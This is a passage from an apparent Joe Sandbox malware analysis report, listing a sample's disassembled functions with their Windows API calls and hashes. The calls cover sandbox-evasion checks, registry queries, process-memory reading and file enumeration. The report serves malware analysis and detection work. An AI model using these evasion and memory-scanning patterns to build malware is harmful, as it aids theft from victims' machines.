                                                            • lstrcatA.KERNEL32(?,0087A548), ref: 0041415B
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3068887934.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000002.00000002.3068887934.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_400000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: lstrcat$CloseOpenQueryValuememset
                                                            • String ID:
                                                            • API String ID: 2623679115-0
                                                            • Opcode ID: bc2d94edd70f49bf8f62656b9ca3487d8b5429edb2de975fb07ca5a133c360a1
                                                            • Instruction ID: 42b23dca6cf9d61fcd17bb79f48ce0988bb9dd5848c5c15250a36de7d2584b3c
                                                            • Opcode Fuzzy Hash: bc2d94edd70f49bf8f62656b9ca3487d8b5429edb2de975fb07ca5a133c360a1
                                                            • Instruction Fuzzy Hash: 6941B6BAD402087BDB14EBE0DC46FEE777DAB88304F00455DB61A571C1EA795B888B92
                                                            Function 022E4317 Relevance: 9.1, APIs: 6, Instructions: 124registrystringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • memset.MSVCRT ref: 022E433C
                                                            • RegOpenKeyExA.ADVAPI32(80000001,0064A4D8,00000000,00020119,?), ref: 022E435B
                                                            • RegQueryValueExA.ADVAPI32(?,0064A0D4,00000000,00000000,00000000,000000FF), ref: 022E437F
                                                            • RegCloseKey.ADVAPI32(?), ref: 022E4389
                                                            • lstrcat.KERNEL32(?,00000000), ref: 022E43AE
                                                            • lstrcat.KERNEL32(?,0064A168), ref: 022E43C2
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3069504910.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_22d0000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: lstrcat$CloseOpenQueryValuememset
                                                            • String ID:
                                                            • API String ID: 2623679115-0
                                                            • Opcode ID: 5690b8b16156ff116e39c423b9c20f7378d9982cb7fd98343760b82f2f9cb978
                                                            • Instruction ID: 774d50453fc92d8a0cf0f41e48c519431a2f8cf08798a2021fe9358087ec2b5a
                                                            • Opcode Fuzzy Hash: 5690b8b16156ff116e39c423b9c20f7378d9982cb7fd98343760b82f2f9cb978
                                                            • Instruction Fuzzy Hash: F641C4B6950208BBDF14FBE0DC45FEE333AAB49300F40455CA61A571D4EA759698CFE2
                                                            Function 00413560 Relevance: 9.1, APIs: 6, Instructions: 122stringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • strtok_s.MSVCRT ref: 00413588
                                                              • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                            • strtok_s.MSVCRT ref: 004136D1
                                                              • Part of subcall function 0041A820: lstrlenA.KERNEL32(00000000,?,?,00415B54,00420ADB,00420ADA,?,?,00416B16,00000000,?,00876340,?,0042110C,?,00000000), ref: 0041A82B
                                                              • Part of subcall function 0041A820: lstrcpy.KERNEL32(B,00000000), ref: 0041A885
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3068887934.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000002.00000002.3068887934.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_400000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: lstrcpystrtok_s$lstrlen
                                                            • String ID:
                                                            • API String ID: 3184129880-0
                                                            • Opcode ID: 64ab5e27dc640e177239ea1b756d4cc1ada2d3f0f35c5ecd3cd97600b2ebe9e7
                                                            • Instruction ID: 1d6e97e2126c91d023f3aa3275f065f217875d3b7f18f669bcfd2096c4fc0c60
                                                            • Opcode Fuzzy Hash: 64ab5e27dc640e177239ea1b756d4cc1ada2d3f0f35c5ecd3cd97600b2ebe9e7
                                                            • Instruction Fuzzy Hash: C34191B1D00108EFCB04EFE5D945AEEB7B4BF44308F00801EE41676291DB789A56CFAA
                                                            Function 0041B38C Relevance: 9.1, APIs: 6, Instructions: 98COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • __lock.LIBCMT ref: 0041B39A
                                                              • Part of subcall function 0041AFAC: __mtinitlocknum.LIBCMT ref: 0041AFC2
                                                              • Part of subcall function 0041AFAC: __amsg_exit.LIBCMT ref: 0041AFCE
                                                              • Part of subcall function 0041AFAC: EnterCriticalSection.KERNEL32(?,?,?,0041AC60,0000000E,0042A0F8,0000000C,0041AC2A), ref: 0041AFD6
                                                            • DecodePointer.KERNEL32(0042A138,00000020,0041B4DD,?,00000001,00000000,?,0041B4FF,000000FF,?,0041AFD3,00000011,?,?,0041AC60,0000000E), ref: 0041B3D6
                                                            • DecodePointer.KERNEL32(?,0041B4FF,000000FF,?,0041AFD3,00000011,?,?,0041AC60,0000000E,0042A0F8,0000000C,0041AC2A), ref: 0041B3E7
                                                              • Part of subcall function 0041BE35: EncodePointer.KERNEL32(00000000,0041C063,004495B8,00000314,00000000,?,?,?,?,?,0041B707,004495B8,Microsoft Visual C++ Runtime Library,00012010), ref: 0041BE37
                                                            • DecodePointer.KERNEL32(-00000004,?,0041B4FF,000000FF,?,0041AFD3,00000011,?,?,0041AC60,0000000E,0042A0F8,0000000C,0041AC2A), ref: 0041B40D
                                                            • DecodePointer.KERNEL32(?,0041B4FF,000000FF,?,0041AFD3,00000011,?,?,0041AC60,0000000E,0042A0F8,0000000C,0041AC2A), ref: 0041B420
                                                            • DecodePointer.KERNEL32(?,0041B4FF,000000FF,?,0041AFD3,00000011,?,?,0041AC60,0000000E,0042A0F8,0000000C,0041AC2A), ref: 0041B42A
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3068887934.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000002.00000002.3068887934.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_400000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Pointer$Decode$CriticalEncodeEnterSection__amsg_exit__lock__mtinitlocknum
                                                            • String ID:
                                                            • API String ID: 2005412495-0
                                                            • Opcode ID: 430bce5bb079d1d45eb37588782b3a2619b50b5e0611126e08e4fa3877c2895d
                                                            • Instruction ID: fa90de3286715eaa6817e9c79d9293911763414a7997c4368e9d4f64dee3ff46
                                                            • Opcode Fuzzy Hash: 430bce5bb079d1d45eb37588782b3a2619b50b5e0611126e08e4fa3877c2895d
                                                            • Instruction Fuzzy Hash: A5314874900309DFDF109FA9C9452DEBAF1FF48314F10802BE454A6262CBB94891DFAE
                                                            Function 022E6C57 Relevance: 9.1, APIs: 6, Instructions: 89sleepCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 022E9AC7: GetProcAddress.KERNEL32(0064A8B0,0064A204), ref: 022E9B08
                                                              • Part of subcall function 022E9AC7: GetProcAddress.KERNEL32(0064A8B0,0064A5C8), ref: 022E9B21
                                                              • Part of subcall function 022E9AC7: GetProcAddress.KERNEL32(0064A8B0,0064A644), ref: 022E9B39
                                                              • Part of subcall function 022E9AC7: GetProcAddress.KERNEL32(0064A8B0,0064A264), ref: 022E9B51
                                                              • Part of subcall function 022E9AC7: GetProcAddress.KERNEL32(0064A8B0,0064A250), ref: 022E9B6A
                                                              • Part of subcall function 022E9AC7: GetProcAddress.KERNEL32(0064A8B0,0064A2F8), ref: 022E9B82
                                                              • Part of subcall function 022E9AC7: GetProcAddress.KERNEL32(0064A8B0,0064A4D4), ref: 022E9B9A
                                                              • Part of subcall function 022E9AC7: GetProcAddress.KERNEL32(0064A8B0,0064A33C), ref: 022E9BB3
                                                              • Part of subcall function 022E9AC7: GetProcAddress.KERNEL32(0064A8B0,0064A5A0), ref: 022E9BCB
                                                              • Part of subcall function 022E9AC7: GetProcAddress.KERNEL32(0064A8B0,0064A548), ref: 022E9BE3
                                                              • Part of subcall function 022E9AC7: GetProcAddress.KERNEL32(0064A8B0,0064A3BC), ref: 022E9BFC
                                                              • Part of subcall function 022E9AC7: GetProcAddress.KERNEL32(0064A8B0,0064A2E8), ref: 022E9C14
                                                              • Part of subcall function 022E9AC7: GetProcAddress.KERNEL32(0064A8B0,0064A60C), ref: 022E9C2C
                                                              • Part of subcall function 022E9AC7: GetProcAddress.KERNEL32(0064A8B0,0064A0B0), ref: 022E9C45
                                                              • Part of subcall function 022EA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022EA9EF
                                                              • Part of subcall function 022D1437: ExitProcess.KERNEL32 ref: 022D1478
                                                              • Part of subcall function 022D13C7: GetSystemInfo.KERNEL32(?), ref: 022D13D1
                                                              • Part of subcall function 022D13C7: ExitProcess.KERNEL32 ref: 022D13E5
                                                              • Part of subcall function 022D1377: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 022D1392
                                                              • Part of subcall function 022D1377: VirtualAllocExNuma.KERNEL32(00000000), ref: 022D1399
                                                              • Part of subcall function 022D1377: ExitProcess.KERNEL32 ref: 022D13AA
                                                              • Part of subcall function 022D1487: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 022D14A5
                                                              • Part of subcall function 022D1487: __aulldiv.LIBCMT ref: 022D14BF
                                                              • Part of subcall function 022D1487: __aulldiv.LIBCMT ref: 022D14CD
                                                              • Part of subcall function 022D1487: ExitProcess.KERNEL32 ref: 022D14FB
                                                              • Part of subcall function 022E69D7: GetUserDefaultLangID.KERNEL32 ref: 022E69DB
                                                              • Part of subcall function 022D13F7: ExitProcess.KERNEL32 ref: 022D142D
                                                              • Part of subcall function 022E7AB7: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,022D141E), ref: 022E7AE7
                                                              • Part of subcall function 022E7AB7: RtlAllocateHeap.NTDLL(00000000), ref: 022E7AEE
                                                              • Part of subcall function 022E7AB7: GetUserNameA.ADVAPI32(00000104,00000104), ref: 022E7B06
                                                              • Part of subcall function 022E7B47: GetProcessHeap.KERNEL32(00000000,00000104), ref: 022E7B77
                                                              • Part of subcall function 022E7B47: RtlAllocateHeap.NTDLL(00000000), ref: 022E7B7E
                                                              • Part of subcall function 022E7B47: GetComputerNameA.KERNEL32(?,00000104), ref: 022E7B96
                                                              • Part of subcall function 022EAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 022EAC2C
                                                              • Part of subcall function 022EAC17: lstrcpy.KERNEL32(00000000), ref: 022EAC6B
                                                              • Part of subcall function 022EAC17: lstrcat.KERNEL32(00000000,00000000), ref: 022EAC79
                                                              • Part of subcall function 022EAB07: lstrcpy.KERNEL32(?,00420E17), ref: 022EAB6C
                                                            • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,0064A540,?,0042110C,?,00000000,?,00421110,?,00000000,00420AEF), ref: 022E6D31
                                                            • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 022E6D4F
                                                            • CloseHandle.KERNEL32(00000000), ref: 022E6D60
                                                            • Sleep.KERNEL32(00001770), ref: 022E6D6B
                                                            • CloseHandle.KERNEL32(?,00000000,?,0064A540,?,0042110C,?,00000000,?,00421110,?,00000000,00420AEF), ref: 022E6D81
                                                            • ExitProcess.KERNEL32 ref: 022E6D89
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3069504910.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_22d0000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser__aulldiv$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                                                            • String ID:
                                                            • API String ID: 2525456742-0
                                                            • Opcode ID: 8bfceb1ee71bfa1add3f5fc1feb3515e0baf2b6ad89577cb8e665fbf230e511d
                                                            • Instruction ID: 6b802aba971a2a858e44c7199d19aa7b74a3148ea55deb98e58b0bce65c7f0ec
                                                            • Opcode Fuzzy Hash: 8bfceb1ee71bfa1add3f5fc1feb3515e0baf2b6ad89577cb8e665fbf230e511d
                                                            • Instruction Fuzzy Hash: D7314671A60308ABDF04FBF0DC54BFD737AAF64300F905518A103A6298EF746A44DE61
                                                            Function 004099C0 Relevance: 9.1, APIs: 6, Instructions: 82filememoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004099EC
                                                            • GetFileSizeEx.KERNEL32(000000FF,?), ref: 00409A11
                                                            • LocalAlloc.KERNEL32(00000040,?), ref: 00409A31
                                                            • ReadFile.KERNEL32(000000FF,?,00000000,004102E7,00000000), ref: 00409A5A
                                                            • LocalFree.KERNEL32(004102E7), ref: 00409A90
                                                            • CloseHandle.KERNEL32(000000FF), ref: 00409A9A
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3068887934.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000002.00000002.3068887934.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_400000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                                                            • String ID:
                                                            • API String ID: 2311089104-0
                                                            • Opcode ID: 7104a1ad71f7267fb3f92d709a770ba7d5c34dd003ba373b3d6e6f2e7190c7f7
                                                            • Instruction ID: ed52a4b53b9c0591db71eabf51b59360b39b3b260bb7ca760b64e801f0f9a50e
                                                            • Opcode Fuzzy Hash: 7104a1ad71f7267fb3f92d709a770ba7d5c34dd003ba373b3d6e6f2e7190c7f7
                                                            • Instruction Fuzzy Hash: 02310778A00209EFDB14CF94C985BAEB7B5FF49350F108169E901A7390D778AD41CFA5
                                                            Function 022D9C27 Relevance: 9.1, APIs: 6, Instructions: 82filememoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 022D9C53
                                                            • GetFileSizeEx.KERNEL32(000000FF,?), ref: 022D9C78
                                                            • LocalAlloc.KERNEL32(00000040,?), ref: 022D9C98
                                                            • ReadFile.KERNEL32(000000FF,?,00000000,022D16F6,00000000), ref: 022D9CC1
                                                            • LocalFree.KERNEL32(022D16F6), ref: 022D9CF7
                                                            • CloseHandle.KERNEL32(000000FF), ref: 022D9D01
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3069504910.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_22d0000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                                                            • String ID:
                                                            • API String ID: 2311089104-0
                                                            • Opcode ID: c3da04e987efa8c3bc657412c5dcc3be7704e612d0e6c1399905993ce2b8bcb5
                                                            • Instruction ID: 57d0184eccfd883a9fbe46d84bccd4f6d7df6eced763943a331e98d88b1d335f
                                                            • Opcode Fuzzy Hash: c3da04e987efa8c3bc657412c5dcc3be7704e612d0e6c1399905993ce2b8bcb5
                                                            • Instruction Fuzzy Hash: AE3114B8A10209EFDB14CFD4C884BAE77F5FB48304F108158F915AB294D778AA81CFA1
                                                            Function 0041C9DE Relevance: 9.0, APIs: 6, Instructions: 47COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • __getptd.LIBCMT ref: 0041C9EA
                                                              • Part of subcall function 0041BF9F: __getptd_noexit.LIBCMT ref: 0041BFA2
                                                              • Part of subcall function 0041BF9F: __amsg_exit.LIBCMT ref: 0041BFAF
                                                            • __amsg_exit.LIBCMT ref: 0041CA0A
                                                            • __lock.LIBCMT ref: 0041CA1A
                                                            • InterlockedDecrement.KERNEL32(?), ref: 0041CA37
                                                            • free.MSVCRT ref: 0041CA4A
                                                            • InterlockedIncrement.KERNEL32(0042B558), ref: 0041CA62
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3068887934.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000002.00000002.3068887934.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_400000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lockfree
                                                            • String ID:
                                                            • API String ID: 634100517-0
                                                            • Opcode ID: 89c3f3603ea426d8c1dcae7c91f98695ae5431033bc18fad3d55e9ead8607d02
                                                            • Instruction ID: 84b4572ca590114782b091576b9a89d8360325c6110713fe167f1eb626e4287d
                                                            • Opcode Fuzzy Hash: 89c3f3603ea426d8c1dcae7c91f98695ae5431033bc18fad3d55e9ead8607d02
                                                            • Instruction Fuzzy Hash: 5801C431A817299BC722EB669C857DE77A0BF04794F01811BE81467390C72C69D2CBDD
                                                            Function 022ECC45 Relevance: 9.0, APIs: 6, Instructions: 47COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • __getptd.LIBCMT ref: 022ECC51
                                                              • Part of subcall function 022EC206: __getptd_noexit.LIBCMT ref: 022EC209
                                                              • Part of subcall function 022EC206: __amsg_exit.LIBCMT ref: 022EC216
                                                            • __amsg_exit.LIBCMT ref: 022ECC71
                                                            • __lock.LIBCMT ref: 022ECC81
                                                            • InterlockedDecrement.KERNEL32(?), ref: 022ECC9E
                                                            • free.MSVCRT ref: 022ECCB1
                                                            • InterlockedIncrement.KERNEL32(0042B980), ref: 022ECCC9
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3069504910.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_22d0000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lockfree
                                                            • String ID:
                                                            • API String ID: 634100517-0
                                                            • Opcode ID: 5d7d5386ca12c030d3e9ef79b035ddd590771242ace2c96a8d9315f1b641efb0
                                                            • Instruction ID: e28fbded98c7fd5dae72b16c23fdeb074884fefa5ce1b9942b7ceca60593d41b
                                                            • Opcode Fuzzy Hash: 5d7d5386ca12c030d3e9ef79b035ddd590771242ace2c96a8d9315f1b641efb0
                                                            • Instruction Fuzzy Hash: BF01D232A21B26ABCF21ABE5944475D7760FF04714FC04127EC16672A8CB746881FFE9
                                                            Function 00416F00 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 156stringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • strlen.MSVCRT ref: 00416F1F
                                                            • ??_U@YAPAXI@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,0041719A,00000000,65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30,00000000,00000000), ref: 00416F4D
                                                              • Part of subcall function 00416BD0: strlen.MSVCRT ref: 00416BE1
                                                              • Part of subcall function 00416BD0: strlen.MSVCRT ref: 00416C05
                                                            • VirtualQueryEx.KERNEL32(?,00000000,?,0000001C), ref: 00416F92
                                                            • ??_V@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0041719A), ref: 004170B3
                                                              • Part of subcall function 00416DE0: ReadProcessMemory.KERNEL32(00000000,00000000,?,?,00000000,00064000,00064000,00000000,00000004), ref: 00416DF8
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3068887934.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000002.00000002.3068887934.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_400000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: strlen$MemoryProcessQueryReadVirtual
                                                            • String ID: @
                                                            • API String ID: 2950663791-2766056989
                                                            • Opcode ID: 0d89010186691ec5492239175b82a1a91f8bc2a2393b87c9978cf9f8736f9be8
                                                            • Instruction ID: da6ee04ed372484ea639f8c5ae6d2cf8ded6d6947598eb42fecba3fc0a9bdd2e
                                                            • Opcode Fuzzy Hash: 0d89010186691ec5492239175b82a1a91f8bc2a2393b87c9978cf9f8736f9be8
                                                            • Instruction Fuzzy Hash: 27511CB5E041099BDB04CF98D981AEFBBB5FF88304F108559F919A7340D738EA51CBA5
                                                            Function 022E7167 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 156stringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • strlen.MSVCRT ref: 022E7186
                                                            • ??_U@YAPAXI@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,022E7401,00000000,00420BA8,00000000,00000000), ref: 022E71B4
                                                              • Part of subcall function 022E6E37: strlen.MSVCRT ref: 022E6E48
                                                              • Part of subcall function 022E6E37: strlen.MSVCRT ref: 022E6E6C
                                                            • VirtualQueryEx.KERNEL32(022E7574,00000000,?,0000001C), ref: 022E71F9
                                                            • ??_V@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,022E7401), ref: 022E731A
                                                              • Part of subcall function 022E7047: ReadProcessMemory.KERNEL32(00000000,00000000,?,?,00000000,00064000,00064000,00000000,00000004), ref: 022E705F
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3069504910.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_22d0000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: strlen$MemoryProcessQueryReadVirtual
                                                            • String ID: @
                                                            • API String ID: 2950663791-2766056989
                                                            • Opcode ID: 0d89010186691ec5492239175b82a1a91f8bc2a2393b87c9978cf9f8736f9be8
                                                            • Instruction ID: 1a5eb8b31e6e47d254f1ef9652c013fac4ea2837b66191479c99be81b83a4cc8
                                                            • Opcode Fuzzy Hash: 0d89010186691ec5492239175b82a1a91f8bc2a2393b87c9978cf9f8736f9be8
                                                            • Instruction Fuzzy Hash: B151F8B1D1010AEBDF04CFD8D991AEFB7B6BF88300F048519F916A7244D774AA01DBA1
                                                            Function 004069B0 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 155libraryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • LoadLibraryA.KERNEL32(00000000,?,?,?,?,?,00406E2A), ref: 00406A19
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3068887934.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000002.00000002.3068887934.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_400000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: LibraryLoad
                                                            • String ID: *n@$*n@
                                                            • API String ID: 1029625771-193229609
                                                            • Opcode ID: bf609db6eed200fea4b15f7f51f4bbb31f3205db81936f2c349fbd39333cdc99
                                                            • Instruction ID: a280f62563b1b8af23ece619f3fba2aedbd92eaccb2561d1aa32790852693925
                                                            • Opcode Fuzzy Hash: bf609db6eed200fea4b15f7f51f4bbb31f3205db81936f2c349fbd39333cdc99
                                                            • Instruction Fuzzy Hash: DA71C874A00119DFCB04CF48C484BEAB7B2FB88315F158179E80AAF391D739AA91CB95
                                                            Function 022E49E7 Relevance: 8.9, APIs: 7, Instructions: 101stringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • lstrcat.KERNEL32(?,0064A30C), ref: 022E4A42
                                                              • Part of subcall function 022E9047: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 022E9072
                                                            • lstrcat.KERNEL32(?,00000000), ref: 022E4A68
                                                            • lstrcat.KERNEL32(?,?), ref: 022E4A87
                                                            • lstrcat.KERNEL32(?,?), ref: 022E4A9B
                                                            • lstrcat.KERNEL32(?,0064A284), ref: 022E4AAE
                                                            • lstrcat.KERNEL32(?,?), ref: 022E4AC2
                                                            • lstrcat.KERNEL32(?,0064A2C8), ref: 022E4AD6
                                                              • Part of subcall function 022EA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022EA9EF
                                                              • Part of subcall function 022E8FF7: GetFileAttributesA.KERNEL32(00000000,?,022D1DBB,?,?,0042565C,?,?,00420E1F), ref: 022E9006
                                                              • Part of subcall function 022E47D7: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 022E47E7
                                                              • Part of subcall function 022E47D7: RtlAllocateHeap.NTDLL(00000000), ref: 022E47EE
                                                              • Part of subcall function 022E47D7: wsprintfA.USER32 ref: 022E480D
                                                              • Part of subcall function 022E47D7: FindFirstFileA.KERNEL32(?,?), ref: 022E4824
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3069504910.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_22d0000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                                                            • String ID:
                                                            • API String ID: 2540262943-0
                                                            • Opcode ID: 78345fe715bd3a89254a4c2b5c0583ef77495b8e9b9ae479ef4891d8c2e90729
                                                            • Instruction ID: f2d4d514add2d969cebb377d1db9d96e4ed18de71ae1ecd4539420b9d826a375
                                                            • Opcode Fuzzy Hash: 78345fe715bd3a89254a4c2b5c0583ef77495b8e9b9ae479ef4891d8c2e90729
